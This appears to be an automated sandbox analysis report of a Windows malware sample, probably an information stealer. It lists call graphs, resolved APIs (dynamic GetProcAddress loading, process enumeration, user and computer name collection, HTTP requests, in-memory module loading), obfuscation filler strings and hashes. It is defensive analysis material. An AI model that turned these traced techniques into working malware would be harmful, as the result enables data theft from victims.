15908->15896 15909 8685a3 15908->15909 15910 86a9b0 4 API calls 15909->15910 15911 8685ba 15910->15911 15912 86a8a0 lstrcpy 15911->15912 15913 8685c6 15912->15913 15914 86a9b0 4 API calls 15913->15914 15915 8685ea 15914->15915 15916 86a8a0 lstrcpy 15915->15916 15917 8685f6 15916->15917 15917->15896 15919 86a740 lstrcpy 15918->15919 15920 8686bc CreateToolhelp32Snapshot Process32First 15919->15920 15921 86875d CloseHandle 15920->15921 15922 8686e8 Process32Next 15920->15922 15923 86a7a0 lstrcpy 15921->15923 15922->15921 15927 8686fd 15922->15927 15926 868776 15923->15926 15924 86a9b0 lstrcpy lstrlen lstrcpy lstrcat 15924->15927 15925 86a8a0 lstrcpy 15925->15927 15926->15376 15927->15922 15927->15924 15927->15925 15929 86a7a0 lstrcpy 15928->15929 15930 8651b5 15929->15930 15931 851590 lstrcpy 15930->15931 15932 8651c6 15931->15932 15947 855100 15932->15947 15934 8651cf 15934->15388 15938 867720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15935->15938 15937 8676b9 15937->15810 15937->15811 15939 867765 
RegQueryValueExA 15938->15939 15940 867780 RegCloseKey 15938->15940 15939->15940 15941 867793 15940->15941 15941->15937 15942->15822 15944 868a0c 15943->15944 15945 8689f9 GetProcessHeap HeapFree 15943->15945 15944->15857 15945->15944 15946->15857 15948 86a7a0 lstrcpy 15947->15948 15949 855119 15948->15949 15950 8547b0 2 API calls 15949->15950 15951 855125 15950->15951 16107 868ea0 15951->16107 15953 855184 15954 855192 lstrlen 15953->15954 15955 8551a5 15954->15955 15956 868ea0 4 API calls 15955->15956 15957 8551b6 15956->15957 15958 86a740 lstrcpy 15957->15958 15959 8551c9 15958->15959 15960 86a740 lstrcpy 15959->15960 15961 8551d6 15960->15961 15962 86a740 lstrcpy 15961->15962 15963 8551e3 15962->15963 15964 86a740 lstrcpy 15963->15964 15965 8551f0 15964->15965 15966 86a740 lstrcpy 15965->15966 15967 8551fd InternetOpenA StrCmpCA 15966->15967 15968 85522f 15967->15968 15969 8558c4 InternetCloseHandle 15968->15969 15970 868b60 3 API calls 15968->15970 15976 8558d9 ctype 15969->15976 15971 85524e 15970->15971 15972 86a920 3 API calls 15971->15972 15973 855261 15972->15973 15974 86a8a0 lstrcpy 15973->15974 15975 85526a 15974->15975 15977 86a9b0 4 API calls 15975->15977 15980 86a7a0 lstrcpy 15976->15980 15978 8552ab 15977->15978 15979 86a920 3 API calls 15978->15979 15981 8552b2 15979->15981 15988 855913 15980->15988 15982 86a9b0 4 API calls 15981->15982 15983 8552b9 15982->15983 15984 86a8a0 lstrcpy 15983->15984 15985 8552c2 15984->15985 15986 86a9b0 4 API calls 15985->15986 15987 855303 15986->15987 15989 86a920 3 API calls 15987->15989 15988->15934 15990 85530a 15989->15990 15991 86a8a0 lstrcpy 15990->15991 15992 855313 15991->15992 15993 855329 InternetConnectA 15992->15993 15993->15969 15994 855359 HttpOpenRequestA 15993->15994 15996 8558b7 InternetCloseHandle 15994->15996 15997 8553b7 15994->15997 15996->15969 15998 86a9b0 4 API calls 15997->15998 15999 8553cb 15998->15999 16000 86a8a0 lstrcpy 15999->16000 16001 8553d4 16000->16001 16002 86a920 3 API calls 
16001->16002 16003 8553f2 16002->16003 16004 86a8a0 lstrcpy 16003->16004 16005 8553fb 16004->16005 16006 86a9b0 4 API calls 16005->16006 16007 85541a 16006->16007 16008 86a8a0 lstrcpy 16007->16008 16009 855423 16008->16009 16010 86a9b0 4 API calls 16009->16010 16011 855444 16010->16011 16012 86a8a0 lstrcpy 16011->16012 16013 85544d 16012->16013 16014 86a9b0 4 API calls 16013->16014 16015 85546e 16014->16015 16108 868ead CryptBinaryToStringA 16107->16108 16110 868ea9 16107->16110 16109 868ece GetProcessHeap RtlAllocateHeap 16108->16109 16108->16110 16109->16110 16111 868ef4 ctype 16109->16111 16110->15953 16112 868f05 CryptBinaryToStringA 16111->16112 16112->16110 16116->15391 16359 859880 16117->16359 16119 8598e1 16119->15398 16121 86a740 lstrcpy 16120->16121 16122 85fb16 16121->16122 16294 86a740 lstrcpy 16293->16294 16295 860266 16294->16295 16296 868de0 2 API calls 16295->16296 16297 86027b 16296->16297 16298 86a920 3 API calls 16297->16298 16299 86028b 16298->16299 16300 86a8a0 lstrcpy 16299->16300 16301 860294 16300->16301 16302 86a9b0 4 API calls 16301->16302 16360 85988d 16359->16360 16363 856fb0 16360->16363 16362 8598ad ctype 16362->16119 16366 856d40 16363->16366 16367 856d63 16366->16367 16368 856d59 16366->16368 16382 856530 16367->16382 16368->16362 16372 856dbe 16372->16368 16392 8569b0 16372->16392 16374 856e2a 16374->16368 16375 856ee6 VirtualFree 16374->16375 16376 856ef7 16374->16376 16375->16376 16378 856f26 FreeLibrary 16376->16378 16379 856f38 16376->16379 16381 856f41 16376->16381 16377 8689f0 2 API calls 16377->16368 16378->16376 16380 8689f0 2 API calls 16379->16380 16380->16381 16381->16368 16381->16377 16383 856542 16382->16383 16385 856549 16383->16385 16402 868a10 GetProcessHeap RtlAllocateHeap 16383->16402 16385->16368 16386 856660 16385->16386 16389 85668f VirtualAlloc 16386->16389 16388 856730 16390 856743 VirtualAlloc 16388->16390 16391 85673c 16388->16391 16389->16388 16389->16391 16390->16391 16391->16372 16393 8569c9 16392->16393 
16397 8569d5 16392->16397 16394 856a09 LoadLibraryA 16393->16394 16393->16397 16395 856a32 16394->16395 16394->16397 16399 856ae0 16395->16399 16403 868a10 GetProcessHeap RtlAllocateHeap 16395->16403 16397->16374 16398 856ba8 GetProcAddress 16398->16397 16398->16399 16399->16397 16399->16398 16400 8689f0 2 API calls 16400->16399 16401 856a8b 16401->16397 16401->16400 16402->16385 16403->16401

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 660 869860-869874 call 869750 663 869a93-869af2 LoadLibraryA * 5 660->663 664 86987a-869a8e call 869780 GetProcAddress * 21 660->664 666 869af4-869b08 GetProcAddress 663->666 667 869b0d-869b14 663->667 664->663 666->667 668 869b46-869b4d 667->668 669 869b16-869b41 GetProcAddress * 2 667->669 671 869b4f-869b63 GetProcAddress 668->671 672 869b68-869b6f 668->672 669->668 671->672 673 869b71-869b84 GetProcAddress 672->673 674 869b89-869b90 672->674 673->674 675 869b92-869bbc GetProcAddress * 2 674->675 676 869bc1-869bc2 674->676 675->676
                              APIs
                              • GetProcAddress.KERNEL32(75550000,015C0570), ref: 008698A1
                              • GetProcAddress.KERNEL32(75550000,015C05A0), ref: 008698BA
                              • GetProcAddress.KERNEL32(75550000,015C0840), ref: 008698D2
                              • GetProcAddress.KERNEL32(75550000,015C0738), ref: 008698EA
                              • GetProcAddress.KERNEL32(75550000,015C0558), ref: 00869903
                              • GetProcAddress.KERNEL32(75550000,015C88E0), ref: 0086991B
                              • GetProcAddress.KERNEL32(75550000,015B6980), ref: 00869933
                              • GetProcAddress.KERNEL32(75550000,015B6960), ref: 0086994C
                              • GetProcAddress.KERNEL32(75550000,015C06A8), ref: 00869964
                              • GetProcAddress.KERNEL32(75550000,015C06D8), ref: 0086997C
                              • GetProcAddress.KERNEL32(75550000,015C06F0), ref: 00869995
                              • GetProcAddress.KERNEL32(75550000,015C05E8), ref: 008699AD
                              • GetProcAddress.KERNEL32(75550000,015B69A0), ref: 008699C5
                              • GetProcAddress.KERNEL32(75550000,015C0708), ref: 008699DE
                              • GetProcAddress.KERNEL32(75550000,015C0600), ref: 008699F6
                              • GetProcAddress.KERNEL32(75550000,015B67A0), ref: 00869A0E
                              • GetProcAddress.KERNEL32(75550000,015C0750), ref: 00869A27
                              • GetProcAddress.KERNEL32(75550000,015C0858), ref: 00869A3F
                              • GetProcAddress.KERNEL32(75550000,015B6740), ref: 00869A57
                              • GetProcAddress.KERNEL32(75550000,015C0888), ref: 00869A70
                              • GetProcAddress.KERNEL32(75550000,015B67E0), ref: 00869A88
                              • LoadLibraryA.KERNEL32(015C0870,?,00866A00), ref: 00869A9A
                              • LoadLibraryA.KERNEL32(015C0900,?,00866A00), ref: 00869AAB
                              • LoadLibraryA.KERNEL32(015C08A0,?,00866A00), ref: 00869ABD
                              • LoadLibraryA.KERNEL32(015C08B8,?,00866A00), ref: 00869ACF
                              • LoadLibraryA.KERNEL32(015C08D0,?,00866A00), ref: 00869AE0
                              • GetProcAddress.KERNEL32(75670000,015C0918), ref: 00869B02
                              • GetProcAddress.KERNEL32(75750000,015C08E8), ref: 00869B23
                              • GetProcAddress.KERNEL32(75750000,015C8CE8), ref: 00869B3B
                              • GetProcAddress.KERNEL32(76BE0000,015C8E98), ref: 00869B5D
                              • GetProcAddress.KERNEL32(759D0000,015B69C0), ref: 00869B7E
                              • GetProcAddress.KERNEL32(773F0000,015C87F0), ref: 00869B9F
                              • GetProcAddress.KERNEL32(773F0000,NtQueryInformationProcess), ref: 00869BB6
                              Strings
                              • NtQueryInformationProcess, xrefs: 00869BAA
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: 4ccd7812e6fdac479c3f387bcc6ab662f512f7c50d726f68879d97ff87e422db
                              • Instruction ID: 90e3eadb59a4b1e9a1602f54ebf73df20ba9db28163c6ff85b362cd9d4b72954
                              • Opcode Fuzzy Hash: 4ccd7812e6fdac479c3f387bcc6ab662f512f7c50d726f68879d97ff87e422db
                              • Instruction Fuzzy Hash: D5A1FAB67102509FD344EFE9ED89A6637F9F7A8301714851BA609C3274DE399843CBD2

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 764 8545c0-854695 RtlAllocateHeap 781 8546a0-8546a6 764->781 782 8546ac-85474a 781->782 783 85474f-8547a9 VirtualProtect 781->783 782->781
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 0085460F
                              • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 0085479C
                              Strings
                              • The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom., xrefs (same string referenced 30 times): 00854617, 008546AC, 00854729, 008546D8, 008545F3, 0085462D, 008546C2, 00854770, 00854678, 00854643, 0085471E, 008545DD, 0085466D, 008545D2, 00854662, 00854734, 0085474F, 0085473F, 00854683, 008546B7, 00854657, 00854765, 00854622, 008545C7, 008545E8, 00854713, 0085477B, 00854638, 0085475A, 008546CD
                              Memory Dump Source
                              • Source File: 00000001.00000002.1471297801.0000000000851000.00000040.00000001.01000000.00000003.sdmp, Offset: 00850000, based on PE: true
                              • Associated: 00000001.00000002.1471254512.0000000000850000.00000004.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000901000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.000000000090D000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000932000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471297801.0000000000A9A000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000AAE000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000C3B000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D18000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D3C000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D49000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1471574405.0000000000D57000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472073993.0000000000D58000.00000080.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472257619.0000000000EFB000.00000040.00000001.01000000.00000003.sdmp
                              • Associated: 00000001.00000002.1472288268.0000000000EFC000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_850000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the 
United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus 
Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.$The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-2218711628
                              • Opcode ID: 08b6f45c390f76d0f3d60777f1fd06da037fcf2904bc1416c467a916b29d7295
                              • Instruction ID: 8cc7c519e88b0b52237ea4b834526effc4448cb6bb5fb9ff19776b1bf0792d03
                              • Opcode Fuzzy Hash: 08b6f45c390f76d0f3d60777f1fd06da037fcf2904bc1416c467a916b29d7295
                              • Instruction Fuzzy Hash: 654137A07C3614EADF2CB7B4884EE9DB752FF42744F509094FC689A384CBF5A5804722

                              Control-flow Graph

                              APIs
                                • Part of subcall function 0086A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0086A7E6
                                • Part of subcall function 008547B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00854839
                                • Part of subcall function 008547B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00854849
                                • Part of subcall function 0086A740: lstrcpy.KERNEL32(00870E17,00000000), ref: 0086A788
                              • InternetOpenA.WININET(00870DFE,00000001,00000000,00000000,00000000), ref: 008562E1
                              • StrCmpCA.SHLWAPI(?,015CE4B0), ref: 00856303
                              • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00856335
                              • HttpOpenRequestA.WININET(00000000,GET,?,015CDD78,00000000,00000000,00400100,00000000), ref: 00856385
                              • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 008563BF
                              • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 008563D1
                              • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 008563FD
                              • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0085646D
                              • InternetCloseHandle.WININET(00000000), ref: 008564EF
                              • InternetCloseHandle.WININET(00000000), ref: 008564F9
                              • InternetCloseHandle.WININET(00000000), ref: 00856503
                              Strings
                              Yara matches
                              Similarity
                              • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                              • String ID: ERROR$ERROR$GET
                              • API String ID: 3749127164-2509457195
                              • Opcode ID: 0f957a6f24d86e1dbe71a0375d9b44713c15d73852ad251220181530a77912ca
                              • Instruction ID: 843c3b07cd3fc67f53ee4ea0d3c08830df315fea42c386f605510cbbc66f4a39
                              • Opcode Fuzzy Hash: 0f957a6f24d86e1dbe71a0375d9b44713c15d73852ad251220181530a77912ca
                              • Instruction Fuzzy Hash: 93714071A00218EBDB14DFD4CC49BEEB774FB54701F508159F509AB290EBB46A89CF92

                              Control-flow Graph

                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00867910
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867917
                              • GetComputerNameA.KERNEL32(?,00000104), ref: 0086792F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateComputerNameProcess
                              • String ID:
                              • API String ID: 1664310425-0
                              • Opcode ID: 05fe64e0312b6ec10f5685aeca4e0c329dd880f3f6561f6edd8b0eb19ca02d0f
                              • Instruction ID: ab74a08e4e6c200f815139d93537b4342079e74d8338322fe5a6d2007e5a5d9e
                              • Opcode Fuzzy Hash: 05fe64e0312b6ec10f5685aeca4e0c329dd880f3f6561f6edd8b0eb19ca02d0f
                              • Instruction Fuzzy Hash: D8016DB1A04208EBD700DF99DD45BAABBB8FB04B25F10425AEA45E2280C77859048BE2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,008511B7), ref: 00867880
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00867887
                              • GetUserNameA.ADVAPI32(00000104,00000104), ref: 0086789F
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 4eecebb087233200e31579179714cb13f1c3920f663faa0c2c502026596af59d
                              • Instruction ID: 26d69cd1214d36c00752de0c2cbf42e8de602293b5fa3c28d2f7661252c12017
                              • Opcode Fuzzy Hash: 4eecebb087233200e31579179714cb13f1c3920f663faa0c2c502026596af59d
                              • Instruction Fuzzy Hash: DBF044B1E44208ABC700DFD5DD49BAEBBB8F704711F10015AFA15E3680C77419058BE1
                              APIs
                              Yara matches
                              Similarity
                              • API ID: ExitInfoProcessSystem
                              • String ID:
                              • API String ID: 752954902-0
                              • Opcode ID: c41f1c6609c263c1767f19f65740987c9acdeb65719ccac22f5c9c16337fd114
                              • Instruction ID: cc8d31470adffda27479ca5c8dadf3a462b128690dd23d7bda0be587c9cfbcc3
                              • Opcode Fuzzy Hash: c41f1c6609c263c1767f19f65740987c9acdeb65719ccac22f5c9c16337fd114
                              • Instruction Fuzzy Hash: 46D05E74A0030CDBCB00DFE0D84A6DDBB78FB08312F001596DD05A2340EA305886CBA6

                              Control-flow Graph

                              APIs
                              • GetProcAddress.KERNEL32(75550000,015B6940), ref: 00869C2D
                              • GetProcAddress.KERNEL32(75550000,015B66A0), ref: 00869C45
                              • GetProcAddress.KERNEL32(75550000,015C8F10), ref: 00869C5E
                              • GetProcAddress.KERNEL32(75550000,015C8F40), ref: 00869C76
                              • GetProcAddress.KERNEL32(75550000,015CCF00), ref: 00869C8E
                              • GetProcAddress.KERNEL32(75550000,015CCF18), ref: 00869CA7
                              • GetProcAddress.KERNEL32(75550000,015BB568), ref: 00869CBF
                              • GetProcAddress.KERNEL32(75550000,015CCF78), ref: 00869CD7
                              • GetProcAddress.KERNEL32(75550000,015CCFA8), ref: 00869CF0
                              • GetProcAddress.KERNEL32(75550000,015CCF60), ref: 00869D08
                              • GetProcAddress.KERNEL32(75550000,015CCF90), ref: 00869D20
                              • GetProcAddress.KERNEL32(75550000,015B66C0), ref: 00869D39
                              • GetProcAddress.KERNEL32(75550000,015B6800), ref: 00869D51
                              • GetProcAddress.KERNEL32(75550000,015B66E0), ref: 00869D69
                              • GetProcAddress.KERNEL32(75550000,015B6700), ref: 00869D82
                              • GetProcAddress.KERNEL32(75550000,015CCEE8), ref: 00869D9A
                              • GetProcAddress.KERNEL32(75550000,015CCF48), ref: 00869DB2
                              • GetProcAddress.KERNEL32(75550000,015BB590), ref: 00869DCB
                              • GetProcAddress.KERNEL32(75550000,015B6840), ref: 00869DE3
                              • GetProcAddress.KERNEL32(75550000,015CCE58), ref: 00869DFB
                              • GetProcAddress.KERNEL32(75550000,015CCF30), ref: 00869E14
                              • GetProcAddress.KERNEL32(75550000,015CCFC0), ref: 00869E2C
                              • GetProcAddress.KERNEL32(75550000,015CCE10), ref: 00869E44
                              • GetProcAddress.KERNEL32(75550000,015B6880), ref: 00869E5D
                              • GetProcAddress.KERNEL32(75550000,015CCEB8), ref: 00869E75
                              • GetProcAddress.KERNEL32(75550000,015CCED0), ref: 00869E8D
                              • GetProcAddress.KERNEL32(75550000,015CCE28), ref: 00869EA6
                              • GetProcAddress.KERNEL32(75550000,015CCE40), ref: 00869EBE
                              • GetProcAddress.KERNEL32(75550000,015CCE70), ref: 00869ED6
                              • GetProcAddress.KERNEL32(75550000,015CCE88), ref: 00869EEF
                              • GetProcAddress.KERNEL32(75550000,015CCEA0), ref: 00869F07
                              • GetProcAddress.KERNEL32(75550000,015CC8E8), ref: 00869F1F
                              • GetProcAddress.KERNEL32(75550000,015CC9F0), ref: 00869F38
                              • GetProcAddress.KERNEL32(75550000,015C9F98), ref: 00869F50
                              • GetProcAddress.KERNEL32(75550000,015CCAB0), ref: 00869F68
                              • GetProcAddress.KERNEL32(75550000,015CCA38), ref: 00869F81
                              • GetProcAddress.KERNEL32(75550000,015B68A0), ref: 00869F99
                              • GetProcAddress.KERNEL32(75550000,015CC9D8), ref: 00869FB1
                              • GetProcAddress.KERNEL32(75550000,015B68C0), ref: 00869FCA
                              • GetProcAddress.KERNEL32(75550000,015CC8D0), ref: 00869FE2
                              • GetProcAddress.KERNEL32(75550000,015CCA08), ref: 00869FFA
                              • GetProcAddress.KERNEL32(75550000,015B6480), ref: 0086A013
                              • GetProcAddress.KERNEL32(75550000,015B6400), ref: 0086A02B
                              • LoadLibraryA.KERNEL32(015CC900,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A03D
                              • LoadLibraryA.KERNEL32(015CC828,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A04E
                              • LoadLibraryA.KERNEL32(015CC918,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A060
                              • LoadLibraryA.KERNEL32(015CCA68,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A072
                              • LoadLibraryA.KERNEL32(015CCA50,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A083
                              • LoadLibraryA.KERNEL32(015CC978,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A095
                              • LoadLibraryA.KERNEL32(015CCAE0,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A0A7
                              • LoadLibraryA.KERNEL32(015CC990,?,00865CA3,00870AEB,?,?,?,?,?,?,?,?,?,?,00870AEA,00870AE3), ref: 0086A0B8
                              • GetProcAddress.KERNEL32(75750000,015B65C0), ref: 0086A0DA
                              • GetProcAddress.KERNEL32(75750000,015CCA80), ref: 0086A0F2
                              • GetProcAddress.KERNEL32(75750000,015C88A0), ref: 0086A10A
                              • GetProcAddress.KERNEL32(75750000,015CC930), ref: 0086A123
                              • GetProcAddress.KERNEL32(75750000,015B64A0), ref: 0086A13B
                              • GetProcAddress.KERNEL32(73B30000,015BB310), ref: 0086A160
                              • GetProcAddress.KERNEL32(73B30000,015B65E0), ref: 0086A179
                              • GetProcAddress.KERNEL32(73B30000,015BAFC8), ref: 0086A191
                              • GetProcAddress.KERNEL32(73B30000,015CCA98), ref: 0086A1A9
                              • GetProcAddress.KERNEL32(73B30000,015CC948), ref: 0086A1C2
                              • GetProcAddress.KERNEL32(73B30000,015B6560), ref: 0086A1DA
                              • GetProcAddress.KERNEL32(73B30000,015B62C0), ref: 0086A1F2
                              • GetProcAddress.KERNEL32(73B30000,015CC8A0), ref: 0086A20B
                              • GetProcAddress.KERNEL32(757E0000,015B6320), ref: 0086A22C
                              • GetProcAddress.KERNEL32(757E0000,015B6420), ref: 0086A244
                              • GetProcAddress.KERNEL32(757E0000,015CC858), ref: 0086A25D
                              • GetProcAddress.KERNEL32(757E0000,015CC960), ref: 0086A275
                              • GetProcAddress.KERNEL32(757E0000,015B64C0), ref: 0086A28D
                              • GetProcAddress.KERNEL32(758D0000,015BAF50), ref: 0086A2B3
                              • GetProcAddress.KERNEL32(758D0000,015BB180), ref: 0086A2CB
                              • GetProcAddress.KERNEL32(758D0000,015CC9A8), ref: 0086A2E3
                              • GetProcAddress.KERNEL32(758D0000,015B6300), ref: 0086A2FC
                              • GetProcAddress.KERNEL32(758D0000,015B6440), ref: 0086A314
                              • GetProcAddress.KERNEL32(758D0000,015BB018), ref: 0086A32C
                              • GetProcAddress.KERNEL32(76BE0000,015CCAC8), ref: 0086A352
                              • GetProcAddress.KERNEL32(76BE0000,015B6600), ref: 0086A36A
                              • GetProcAddress.KERNEL32(76BE0000,015C8820), ref: 0086A382
                              • GetProcAddress.KERNEL32(76BE0000,015CCAF8), ref: 0086A39B
                              • GetProcAddress.KERNEL32(76BE0000,015CC8B8), ref: 0086A3B3
                              • GetProcAddress.KERNEL32(76BE0000,015B6620), ref: 0086A3CB
                              • GetProcAddress.KERNEL32(76BE0000,015B6660), ref: 0086A3E4
                              • GetProcAddress.KERNEL32(76BE0000,015CC810), ref: 0086A3FC
                              • GetProcAddress.KERNEL32(76BE0000,015CCA20), ref: 0086A414
                              • GetProcAddress.KERNEL32(75670000,015B6640), ref: 0086A436
                              • GetProcAddress.KERNEL32(75670000,015CC840), ref: 0086A44E
                              • GetProcAddress.KERNEL32(75670000,015CC9C0), ref: 0086A466
                              • GetProcAddress.KERNEL32(75670000,015CC870), ref: 0086A47F
                              • GetProcAddress.KERNEL32(75670000,015CC888), ref: 0086A497
